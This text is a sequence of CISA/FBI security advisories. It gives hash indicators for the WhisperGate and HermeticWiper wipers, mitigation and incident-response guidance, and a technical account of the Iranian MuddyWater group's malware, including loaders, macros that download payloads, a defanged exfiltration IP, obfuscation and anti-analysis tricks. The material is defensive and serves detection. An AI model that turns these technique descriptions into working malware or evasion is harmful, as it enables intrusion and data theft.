Table 1: IOCs associated with WhisperGate

Name File Category File Hash Source WhisperGate   stage1.exe 

a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92

Microsoft MSTIC   WhisperGate stage2.exe

dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78

Microsoft MSTIC

 

(Updated April 28, 2022) See Appendix: Additional IOCs associated with WhisperGate.

On February 23, 2022, cybersecurity researchers disclosed that malware known as HermeticWiper was being used against organizations in Ukraine. According to SentinelLabs, the malware targets Windows devices, manipulating the master boot record and resulting in subsequent boot failure. Note: according to Broadcom Software, “[HermeticWiper] has some similarities to the earlier WhisperGate wiper attacks against Ukraine, where the wiper was disguised as ransomware.” See the following resources for more information and see the IOCs in table 2 below. 

Table 2: IOCs associated with HermeticWiper

Name File Category File Hash Source Win32/KillDisk.NCV Trojan 912342F1C840A42F6B74132F8A7C4FFE7D40FB77
61B25D11392172E587D8DA3045812A66C3385451
  ESET research HermeticWiper Win32 EXE 912342f1c840a42f6b74132f8a7c4ffe7d40fb77

SentinelLabs

HermeticWiper Win32 EXE 61b25d11392172e587d8da3045812a66c3385451

SentinelLabs

RCDATA_DRV_X64 ms-compressed a952e288a1ead66490b3275a807f52e5

SentinelLabs

RCDATA_DRV_X86 ms-compressed 231b3385ac17e41c5bb1b1fcb59599c4

SentinelLabs

RCDATA_DRV_XP_X64 ms-compressed 095a1678021b034903c85dd5acb447ad

SentinelLabs

RCDATA_DRV_XP_X86  ms-compressed eb845b7a16ed82bd248e395d9852f467

SentinelLabs

Trojan.Killdisk Trojan.Killdisk  1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 Symantec Threat Hunter Team Trojan.Killdisk Trojan.Killdisk 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da  Symantec Threat Hunter Team Trojan.Killdisk Trojan.Killdisk a64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e Symantec Threat Hunter Team Ransomware Trojan.Killdisk 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 Symantec Threat Hunter Team MitigationsBest Practices for Handling Destructive Malware

As previously noted above, destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Organizations should increase vigilance and evaluate their capabilities, encompassing planning, preparation, detection, and response, for such an event. This section is focused on the threat of malware using enterprise-scale distributed propagation methods and provides recommended guidance and considerations for an organization to address as part of their network architecture, security baseline, continuous monitoring, and incident response practices. 

CISA and the FBI urge all organizations to implement the following recommendations to increase their cyber resilience against this threat.

Potential Distribution Vectors

Destructive malware may use popular communication tools to spread, including worms sent through email and instant messages, Trojan horses dropped from websites, and virus-infected files downloaded from peer-to-peer connections. Malware seeks to exploit existing vulnerabilities on systems for quiet and easy access.

The malware has the capability to target a large scope of systems and can execute across multiple systems throughout a network. As a result, it is important for organizations to assess their environment for atypical channels for malware delivery and/or propagation throughout their systems. Systems to assess include:

  • Enterprise applications – particularly those that have the capability to directly interface with and impact multiple hosts and endpoints. Common examples include:
    • Patch management systems,
    • Asset management systems,
    • Remote assistance software (typically used by the corporate help desk),
    • Antivirus (AV) software,
    • Systems assigned to system and network administrative personnel,
    • Centralized backup servers, and
    • Centralized file shares.

While not only applicable to malware, threat actors could compromise additional resources to impact the availability of critical data and applications. Common examples include:

  • Centralized storage devices
    • Potential risk – direct access to partitions and data warehouses.
  • Network devices
    • Potential risk – capability to inject false routes within the routing table, delete specific routes from the routing table, remove/modify, configuration attributes, or destroy firmware or system binaries—which could isolate or degrade availability of critical network resources.
Best Practices and Planning Strategies

Common strategies can be followed to strengthen an organization’s resilience against destructive malware. Targeted assessment and enforcement of best practices should be employed for enterprise components susceptible to destructive malware.

Communication Flow
  • Ensure proper network segmentation.
  • Ensure that network-based access control lists (ACLs) are configured to permit server-to-host and host-to-host connectivity via the minimum scope of ports and protocols and that directional flows for connectivity are represented appropriately.
    • Communications flow paths should be fully defined, documented, and authorized.
  • Increase awareness of systems that can be used as a gateway to pivot (lateral movement) or directly connect to additional endpoints throughout the enterprise.
    • Ensure that these systems are contained within restrictive Virtual Local Area Networks (VLANs), with additional segmentation and network access controls.
  • Ensure that centralized network and storage devices’ management interfaces reside on restrictive VLANs.
    • Layered access control, and
    • Device-level access control enforcement – restricting access from only pre-defined VLANs and trusted IP ranges.
Access Control
  • For enterprise systems that can directly interface with multiple endpoints:
    • Require multifactor authentication for interactive logons.
    • Ensure that authorized users are mapped to a specific subset of enterprise personnel.
      • If possible, the “Everyone,” “Domain Users,” or the “Authenticated Users” groups should not be permitted the capability to directly access or authenticate to these systems.
    • Ensure that unique domain accounts are used and documented for each enterprise application service.
      • Context of permissions assigned to these accounts should be fully documented and configured based upon the concept of least privilege.
      • Provides an enterprise with the capability to track and monitor specific actions correlating to an application’s assigned service account.
    • If possible, do not grant a service account with local or interactive logon permissions.
      • Service accounts should be explicitly denied permissions to access network shares and critical data locations.
    • Accounts that are used to authenticate to centralized enterprise application servers or devices should not contain elevated permissions on downstream systems and resources throughout the enterprise.
  • Continuously review centralized file share ACLs and assigned permissions.
    • Restrict Write/Modify/Full Control permissions when possible.
Monitoring
  • Audit and review security logs for anomalous references to enterprise-level administrative (privileged) and service accounts.
    • Failed logon attempts,
    • File share access, and
    • Interactive logons via a remote session.
  • Review network flow data for signs of anomalous activity, including:
    • Connections using ports that do not correlate to the standard communications flow associated with an application,
    • Activity correlating to port scanning or enumeration, and
    • Repeated connections using ports that can be used for command and control purposes.
  • Ensure that network devices log and audit all configuration changes.
    • Continually review network device configurations and rule sets to ensure that communications flows are restricted to the authorized subset of rules.
File Distribution
  • When deploying patches or AV signatures throughout an enterprise, stage the distributions to include a specific grouping of systems (staggered over a pre-defined period).
    • This action can minimize the overall impact in the event that an enterprise patch management or AV system is leveraged as a distribution vector for a malicious payload.
  • Monitor and assess the integrity of patches and AV signatures that are distributed throughout the enterprise.
    • Ensure updates are received only from trusted sources,
    • Perform file and data integrity checks, and
    • Monitor and audit – as related to the data that is distributed from an enterprise application.
System and Application Hardening
  • Ensure robust vulnerability management and patching practices are in place. 
    • CISA maintains a living catalog of known exploited vulnerabilities that carry significant risk to federal agencies as well as public and private sectors entities. In addition to thoroughly testing and implementing vendor patches in a timely—and, if possible, automated— manner, organizations should ensure patching of the vulnerabilities CISA includes in this catalog.
  • Ensure that the underlying operating system (OS) and dependencies (e.g., Internet Information Services [IIS], Apache, Structured Query Language [SQL]) supporting an application are configured and hardened based upon industry-standard best practice recommendations. Implement application-level security controls based on best practice guidance provided by the vendor. Common recommendations include:
    • Use role-based access control,
    • Prevent end-user capabilities to bypass application-level security controls,
      • For example, do not allow users to disable AV on local workstations.
    • Remove, or disable unnecessary or unused features or packages, and
    • Implement robust application logging and auditing.
Recovery and Reconstitution Planning

A business impact analysis (BIA) is a key component of contingency planning and preparation. The overall output of a BIA will provide an organization with two key components (as related to critical mission/business operations):

  • Characterization and classification of system components, and
  • Interdependencies.

Based upon the identification of an organization’s mission critical assets (and their associated interdependencies), in the event that an organization is impacted by destructive malware, recovery and reconstitution efforts should be considered.

To plan for this scenario, an organization should address the availability and accessibility for the following resources (and should include the scope of these items within incident response exercises and scenarios):

  • Comprehensive inventory of all mission critical systems and applications:
    • Versioning information,
    • System/application dependencies,
    • System partitioning/storage configuration and connectivity, and
    • Asset owners/points of contact.
  • Contact information for all essential personnel within the organization,
  • Secure communications channel for recovery teams,
  • Contact information for external organizational-dependent resources:
    • Communication providers,
    • Vendors (hardware/software), and
    • Outreach partners/external stakeholders
  • Service contract numbers – for engaging vendor support,
  • Organizational procurement points of contact,
  • Optical disc image (ISO)/image files for baseline restoration of critical systems and applications:
    • OS installation media,
    • Service packs/patches,
    • Firmware, and
    • Application software installation packages.
  • Licensing/activation keys for OS and dependent applications,
  • Enterprise network topology and architecture diagrams,
  • System and application documentation,
  • Hard copies of operational checklists and playbooks,
  • System and application configuration backup files,
  • Data backup files (full/differential),
  • System and application security baseline and hardening checklists/guidelines, and
  • System and application integrity test and acceptance checklists.
Incident Response

Victims of a destructive malware attacks should immediately focus on containment to reduce the scope of affected systems. Strategies for containment include:

  • Determining a vector common to all systems experiencing anomalous behavior (or having been rendered unavailable)—from which a malicious payload could have been delivered:
    • Centralized enterprise application,
    • Centralized file share (for which the identified systems were mapped or had access),
    • Privileged user account common to the identified systems,
    • Network segment or boundary, and
    • Common Domain Name System (DNS) server for name resolution.
  • Based upon the determination of a likely distribution vector, additional mitigation controls can be enforced to further minimize impact:
    • Implement network-based ACLs to deny the identified application(s) the capability to directly communicate with additional systems,
      • Provides an immediate capability to isolate and sandbox specific systems or resources.
    • Implement null network routes for specific IP addresses (or IP ranges) from which the payload may be distributed,
      • An organization’s internal DNS can also be leveraged for this task, as a null pointer record could be added within a DNS zone for an identified server or application.
    • Readily disable access for suspected user or service account(s),
    • For suspect file shares (which may be hosting the infection vector), remove access or disable the share path from being accessed by additional systems, and
    • Be prepared to, if necessary, reset all passwords and tickets within directories (e.g., changing golden/silver tickets). 

As related to incident response and incident handling, organizations are encouraged to report incidents to the FBI and CISA (see the Contact section below) and to preserve forensic data for use in internal investigation of the incident or for possible law enforcement purposes. See Technical Approaches to Uncovering and Remediating Malicious Activity for more information.

Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at central@cisa.dhs.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

Resources

Updated April 28, 2022:

Appendix: Additional IOCS Associated with WhisperGate

The hashes in Table 3 contain malicious binaries, droppers, and macros linked to WhisperGate cyber actors activity. The binaries are predominantly .Net and are obfuscated. Obfuscation varies; some of the binaries contain multiple layers of obfuscation. Analysis identified multiple uses of string reversal, character replacement, base64 encoding, and packing. Additionally, the malicious binaries contain multiple defenses including VM checks, sandbox detection and evasion, and anti-debugging techniques. Finally, the sleep command was used in varying lengths via PowerShell to obfuscate execution on a victim’s network. 
All Microsoft .doc files contain a malicious macro that is base64 encoded. Upon enabling the macro, a PowerShell script runs a sleep command and then downloads a file from an external site. The script connects to the external website via HTTP to download an executable. Upon download, the executable is saved to C:\Users\Public\Documents\ filepath on the victim host. 
An identified zip file was found to contain the Microsoft Word file macro_t1smud.doc. Once the macro is enabled, a bash script runs a sleep command and the script connects to htxxps://the.earth.li/~sgtatham/putty/latest/w32/putty.exe. This binary is likely the legitimate Putty Secure Shell binary. Upon download the file is saved to C:\Users\Public\Documents\ file path.

Profile of Malicious Hashes

  • Saintbot (and related .Net loaders) 
  • WhisperGate Malware and related VB files 
  • Quasar RAT 
  • .NET Infostealer malware
  • Telegram Bot
  • Multiple Loaders (mostly utilizing PowerShell that pull down a jpg or bin files)
  • Jpg/PNG files = obfuscated executables
  • antidef.bat = likely a bat file to disable Windows Defender

Table 3: Additional IOCs associated with WhisperGate

Hash

Associated Files

647ebdca2ef6b74b17bb126df19bf0ed88341650

loader2132.exe

24f71409bde9d01e3519236e66f3452236302e46

saint.exe

1e3497ac435936be06ba665a4acd06b850cf56b4

loader.exe

981319f00b654d0142430082f2e636ef69a377d9

Yudjcfoyg.exe

e0dbe49c9398a954095ee68186f391c288b9fcc5

Project_1.exe

0ba64c284dc0e13bc3f7adfee084ed25844da3d2

Hjtiyz.jpg

6b8eab6713abb7c1c51701f12f23cdff2ff3a243

Ltfckzl.jpg

3bbb84206f0c81f7fd57148f913db448a8172e92

Vgdnggv.jpg

7c77b1c72a2228936e4989de2dfab95bfbbbc737

Pfiegomql.jpg

c0cd6f8567df73e9851dbca4f7c4fbfe4813a2e1

Fezpwij.jpg

d6830184a413628db9946faaae8b08099c0593a0

Bqpptgcal.jpg

d083da96134924273a7cbc8b6c51c1e92de4f9e1

loader.jpg

d599f16e60a916f38f201f1a4e6d73cb92822502

Debythht.jpg

9b9374a5e376492184a368fcc6723a7012132eae

Dmhdgocsp.jpg

86bd95db7b514ea0185dba7876fa612fae42b715

Zysyrokzk.jpg

e7917df9feabfedae47d8b905136d52cb5cb7f37

Baeipiyd.jpg

b2d863fc444b99c479859ad7f012b840f896172e

Tbopbh.jpg

d85e1614cf4a1e9ec632580b62b0ecb5f8664352

Lxkdjr.jpg

08f0b0d66d370151fd8a265b1f9be8be61cc1aa9

Twojt.bin

5ac592332a406d5b2dcfc81b131d261da7e791d2

Rvlxi.bin

052825569c880212e1e39898d387ef50238aaf35

Yarfe.bin

4c2a0f44b176ba83347062df1d56919a25445568

Ftvqpq.bin

d51214461fc694a218a01591c72fe89af0353bc1

Pkbsu.bin

1125b2c3c91491aa71e0536bb9a8a1b86ff8f641

Pkcxiu.bin

37f54f121bcae65b4b3dd680694a11c5a5dfc406

loader.bin

4facd9a973505bb00eb1fd9687cbab906742df73

loader.bin

376a2339cbbb94d33f82dea2ea78bb011485e0d9

Qmpnrffn.bin

b6793fc62b27ee3cce24e9e63e3108a777f71904

Vpzhote.bin

1fc463b2f53ba0889c90cc2b7866afae45a511de

Yymmdbfrb.bin

ff71f9defc2dd27b488d961ce0fbc6ece56b2962

Zlhmmwutx.bin

13ca079770f6f9bdddfea5f9d829889dc1fbc4ed

Xhlnfjeqy.bin

c99c982d1515ade3da81268e79f5e5f7d550aabd

Gpfsqm.png

d6ffa42548ff12703e38c5db6c9c39c34fe3d82a

Ktlbo.png

bd5116865bcf066758f817ba9385cc7d001ecad9

Vgdnggv.png

034c0d73b21cf17c25c086d19a6ef3bb8a06bab7

Rsscffiiu.png

69e4efc8000a473d2b2c0067f317b22664453205

loader.png

424f7a756f72f1da9012859bf86ad7651bafa937

Wmztvc.png

6c64e1f2ba11ecff5e899f880d14da42acf3f699

Ygxdlt.png

fa8a373e837d7be2fce0bfe073a6fdeaefc56ca1

Fewbfaklk.png

0eccc0aa674fd9fc27023c70067e630fd5d21cd6

www.google.png

6e11c3e119499f11b83787cc4bb5f2751bd90219

Nxoaa.com

8a93bfd9e70611547a420971662d113b6b3c6234

Lxkdjr.com

b19d5f0d8696271aff5af616b91a4cdc73981934

www.google.com

b5e3e65cd6b09b17d4819a1379dde7db3e33813b

Cpdfx.jpeg

d92e315f3c290a7e71950480f074af5b59e8bd3d

Mtubbb.jpeg

fb83899dc633c59a8473a3048c9aacce7e1bf8d8

Kzwolw.jpeg

5fbd9bd73040d7a2cac0fc21d2fe29ebe57fb597

Fczdcmep.jpeg

90fa56e79765d27d35706d028d32dc5be7efb623

Jdeiipc.jpeg

cd8ef5a2543a2535416655f861c574c63e9008ea

5415.jpeg

72a45d6bfde93eb92a7b7a1ea284f35e1d24203a

000.jpeg

d2a697fc1b61888c49a48ce094e400b62a71201d

Ofewufeiy.exe

bddb6994656659d098d6040dc895e90877fb1266

load.exe

00d6c66ab2fd1810628d13980cc73275884933b1

loader.exe

12f50a97955497c49f9603ea2531384e430f0df5

loader.exe

27c176bbd3e254d5e46ccb865d29c8c166ba4a9f

Wdlord.bin

88c76d31b046227d82f94db87697b25e482eb398

Ofewufeiy.bin

2e113050a81bbd0774db7e86fad4abd44e5b6ec2

Bdfjvu.bin

db370ee79d9b4bd44e07f425d7b06beffc8bdded

Jdnpanki.bin

88e5bf24bd0f01778217c4fcdb37b76929c2d32b

downloader.bin

f6acdc16c695c3c219116aea3d585efedcafdab5

up74987340.bin

c3181fd7cb463893fc73974acc0016605d90ef6c

Tdivhgry.png

731dab83ef1d02203db64fbefbe59f3791db1e21

Mbowytboz.png

50566fdea2f4b8a3466427f9c6798dabe2587823

Tlmbluje.png

5dbd68dd3bab6f3a06e303d68bb23e37994084eb

loader.png

ac618c4ece55eca2b067bedd2ce963b8ada30b40

antidef.bat

a0074dbb3316eb570c08219609921a33052d7356

antidef.bat

c4f8d6354ef3ee4e437aa7312df0121446d3a71f

antidef.bat

d9c2ce9c53f10cd12844a98270b4559e9fbfde44

antidef.bat

87a36b87bade46d0b0614b104152db7814808b21

antidef.bat

d3ff54b679922ff9296bfb1b4c379d361f44afd9

1631031555.doc

71daf7af9480743f9e20254946521d6b648b0fe8

1631031555.doc

1aa120fe90d053060fb4e741bcde1f41d6d33303

1631031555.doc

aa124ef17e870e6cd291cb371cde52ca4ffc94d2

1631031555.doc

f79829972bc0ace5c498df3a840acf7d41c56056

1631031555.doc

efa60e42ff1f5c5b57b9fb15a5b04baded2c4c82

1631031555.doc

c96fc59fbe8495dbb50e5ba73b53496614ef8a8a

1631031555.doc

09650cb7a5ed0f43cf67985d03182ca608591a7c

1631031555.doc

c9600ba9e63500b2fe345ff190042ef11d4ce88e

1631031555.doc

ba6f3e474174bcb97c365b4d6365c71ca294aa16

1631031555.doc

f71f0289d99aa1334e7e74b68320cbabbd37fbc1

1631031555.doc

50df153f513b3be09e474b23553b3610625fbb41

1631031555.doc

9496494756ab4276cf4e4aeb4988e781f0db031a

1631031555.doc

4de3118370c2720d60df566684b8b3b7ebf6dfa2

1631031555.doc

d2d475d2df5b0ec1e97ea45e499f55e45d2aac17

1631031555.doc

cdf858add61db5c44503f78cda67915ddb0f77d6

1631031555.doc

39e7abe29f4a574d80b438233e4d2099b99000bb

1631031555.doc

4212472d84ab9f36402bcc12193b9c63901a21d2

1631031555.doc

2277461ac707766f5bb694235b7edfd78af26ff1

1631031555.doc

d57100a6d734be30a8a92734175a67983c7b0c32

1631031555.doc

ba9a811915c3134bfde4414b051a8e6d7949080c

1631031555.doc

1d543a67ea0fcbc5cdc3d698af0d285356d2001b

1631031555.doc

965e4bae8d753efc695c3b1705f43ea7333a1688

1631031555.doc

594fad1593de55df36f294a32330f7b6f487a3e8

1631031555.doc

ac672a07c62d48c0a7f98554038913770efaef11

1631031555.doc

fa62e7df0cc1ece81ba2228cc22be01214cab2ab

1631031555.doc

fdc6bf0a4154d79115ddfac02134580ac4685222

1631031555.doc

e5828387cd6f596932d6caebfd76de1df5ba9ee2

1631031555.doc

f5c769d2a27877e56cc0c540490b26c7c0ff25dd

1631031555.doc

b589574d1ca3438929b8051329552d8e62a7a128

1631031555.doc

1f731bef9777cd4531de39b98a881d83506bb5d9

1631031555.doc

e68dc7a106dab7186fc3ff3f7c70ab280b89d17d

1631031555.doc

572acb2baea77c5ba8e9fe668fd81a817e695d73

1631031555.doc

27a6e76209de03e55136dd72533f3c81d3e715e4

1631031555.doc

1ae21693ce6060059a1284a1e3166f735c339687

1631031555.doc

9e96114159d458597ed2fdc8603a97c9cd2c1e90

1631031555.doc

ca00849b308d48daaea7d86e0d7c7af580a2e856

1631031555.doc

305d215c36d2a7fd9913007059a93e140503870d

1631031555.doc

d503b4818a36f7eae9fbee0d8468b811bca87e83

1631031555.doc

512510a1a5c20ecbcc96781366edaaac58ae4608

1631031555.doc

e53c3b7726cb36b3e898d48ad0f25dbd032e8a8b

1631031555.doc

2ecbb11218f3a24a6c1f33ea7027ab714fad2c3f

1631031555.doc

93cecf50d645ff633ef57e014c49a3ae967140c6

1631031555.doc

10bc94cdefb8ed8d305d087ca868b8fe963c69d4

1631031555.doc

c4740eec9528e1a205326c8a7b7e8d44c8a5b6b1

1631031555.doc

312b8526b3e961887104e80f6447f5bb33ed06df

1631031555.doc

88750f0e1f488656ef0aeb3c40a5785d6c72eb3f

1631031555.doc

c5e57aa3e027f1ae4d3216a5b652b11a63314534

1631031555.doc

d6594fda649e3e4f15ea35e8ed29ac5c8c14760a

1631031555.doc

f831bb0148a8f9d34f914d9560be062c821a7d83

1631031555.doc

b48cbc3ba518c9db5840169e1e21b3ca66cd8177

1631031555.doc

3bb75935fc79205dffccb6102a19f0b96300ab70

1631031555.doc

9d0d4de1d09624de659ce39f449ce5a17f1bef50

1631031555.doc

5ab518686fcd3879dd8c02d74b97caa333ea51ab

1631031555.doc

8fbc7565af01b4a53c72fede3678f4aeba40c5f4

1631031555.doc

8998c076c21930b8fb223882fd9d82899544a902

1621031555.doc

988f07a4094a4a93b76a165ea9f7e251bbbf340f

1621031555.doc

95cf3c261178388c850a777ffe981bbeb287afcb

1621031555.doc

e52cea59499060b8d0e84a7594a687448599f386

1621031555.doc

cdcccb2a011cd22f49d7a96ffb06df3fe334f960

1621031555.doc

5ec9d35b41ee59d109370b257603aa804ecb7c15

1621031555.doc

42a28a4fa6bdb674be63001cd5efff6f7c1b11fc

1621031555.doc

4fabb94902244f60fd2359c61c1c79434095a2ba

1621031555.doc

fbc4d60042c69bf2b5fec701201b24ceb22a43fe

1621031555.doc

5096ca0de8b6ca27dcdcf5790a2cb99566f03e04

1622031555.doc

f7cf30c68989c4a3852397f59fda5d8d1f67f396

1622031555.doc

c4ebbfcb3dc47a1260a0af9b3eb9b125f48d22cc

1622031555.doc

59b03cfb7f2d672f66eb6d027244cb1d9f39f30a

16.09.2021.pdf.js

4ac3c035909101ebddcb78573723d4d48b293a6e

loader_exe_64_97975_1.exe

f990e9c85cd196f9380930e951fbc2085fdf76b7

api_signed_3.exe

e8623063485c61d7411fab8f72cfdbab08f29131

api_crypted_2.exe

e0770b79e372f2cab86ae2ec33b5160708059eee

payload.exe

2ee451947da9efdee0e9f39c9623f388297db6b4

test2.exe

21312d.exe

c681f91c80673deff9f6efa61060f597fc0c1cd0

payload.exe

d8d875f31c4d7c40cfd6483d6b250943d4f5e437

api177_crypted.exe

f24c3237a1612888c8b5526e557a963f3b73e984

api177_signed.exe

76152dc6243ae29d8315f24f6e9449d620f672cd

Fearsomely.exe

d08d894023b16b8374466e6e9ede97f56f7cd4c7

firstgoon.exe

f7ab3996edf81551fdd867fdd28a616491445c38

test4.exe

31ef83a2032cdcc2412991a8fbfe75ed1eed11e8

documents.exe

d08d894023b16b8374466e6e9ede97f56f7cd4c7

firstgoon1.exe

8b9e47457a645d41b98ba07249e8cc3406831cb5

7.exe

f9b6fff55fef34fc49432c8338eb3e9c0c44286e

Matrix_MAX.exe

b91ede2fa35ea3d4031fb51c32bc8211ab5f1e75

crypted.exe

d665b0cfd313d8a72586b0515b92496dd7dc4bb0

crypted_2.exe

4a434c738e402242ecca92182312f04ce336ff86

work.exe

3e50a761cd4bbd9eeaf8f6b9629f9ce871d6f2dd

SLP.exe

6c216522d2a1211399fb08567fcdec1d341340e3

Downloader.exe

6d11b5e4fce9c580b06298ca3dd4a6134fe4b520

Xhlnfjeqy.exe

3ac2d185c28548d43ea47b8fa3795b4308a4c39d

Jdnpanki.exe

e0770b79e372f2cab86ae2ec33b5160708059eee

payload.vbs

payload_2.vbs

98ab3ae46358a66c480810d1e4f24ef730e4dc7e

1.rar

Revisions
  • February 26, 2022: Initial Revision
  • March 1, 2022: Added STIX version.
  • April 28, 2022: Updated IOCs.

This product is provided subject to this Notification and this Privacy & Use policy.

Categories: Security Alerts

AA22-055A : Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

US-CERT Security Alerts - Thu, 02/24/2022 - 08:00
Original release date: February 24, 2022
Summary

Actions to Take Today to Protect Against Malicious Activity
* Search for indicators of compromise.
* Use antivirus software.
* Patch all systems.
* Prioritize patching known exploited vulnerabilities.
* Train users to recognize and report phishing attempts.
* Use multi-factor authentication.

Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity. 

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. 

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.

Click here for a PDF version of this report.

Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 

As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [T1566.001, T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information). 

Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.

PowGoop

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:

  • A DLL file renamed as a legitimate filename, Goopdate.dll, to enable the DLL side-loading technique [T1574.002]. The DLL file is contained within an executable, GoogleUpdate.exe. 
  • A PowerShell script, obfuscated as a .dat file, goopdate.dat, used to decrypt and run a second obfuscated PowerShell script, config.txt [T1059.001].
  • config.txt, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 

Small Sieve

According to a sample analyzed by NCSC-UK, Small Sieve is a simple Python [T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installs the Python backdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003]. 

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., "Microsift") and Outlook in its filenames associated with Small Sieve [T1036.005].

Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027], T1132.002].

Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 

See Appendix B for further analysis of Small Sieve malware.

Canopy

MuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted attachments [T1566.001]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows Script File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United Kingdom and the United States attribute these malware samples to MuddyWater with high confidence. 

In the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls, contained macros written in Visual Basic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they receive a prompt to enable macros [T1204.002]. Once this occurs, the macros are executed, decoding and installing the two embedded Windows Script Files.

The first .wsf is installed in the current user startup folder [T1547.001] for persistence. The file contains hexadecimal (hex)-encoded strings that have been reshuffled [T1027]. The file executes a command to run the second .wsf.

The second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035] the victim system’s IP address, computer name, and username [T1005]. The collected data is then hex-encoded and sent to an adversary-controlled IP address, http[:]88.119.170[.]124, via an HTTP POST request [T1041].

Mori

MuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group’s C2 infrastructure [T1572]. 

According to one sample analyzed by CISA, FML.dll, Mori uses a DLL written in C++ that is executed with regsvr32.exe with export DllRegisterServer; this DLL appears to be a component to another program. FML.dll contains approximately 200MB of junk data [T1001.001] in a resource directory 205, number 105. Upon execution, FML.dll creates a mutex, 0x50504060, and performs the following tasks:

  • Deletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old extension.
  • Resolves networking APIs from strings that are ADD-encrypted with the key 0x05.
  • Uses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library functions. It appears likely that JSON is used to serialize C2 commands and/or their results.
  • Communicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2 [T1071.001].
  • Reads and/or writes data from the following Registry Keys, HKLM\Software\NFC\IPA and HKLM\Software\NFC\(Default).
POWERSTATS

This group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent access to the victim systems [T1059.001]. 

CNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools— along with JavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and repository, Virus Total. Network operators who identify multiple instances of the tools on the same network should investigate further as this may indicate the presence of an Iranian malicious cyber actor.

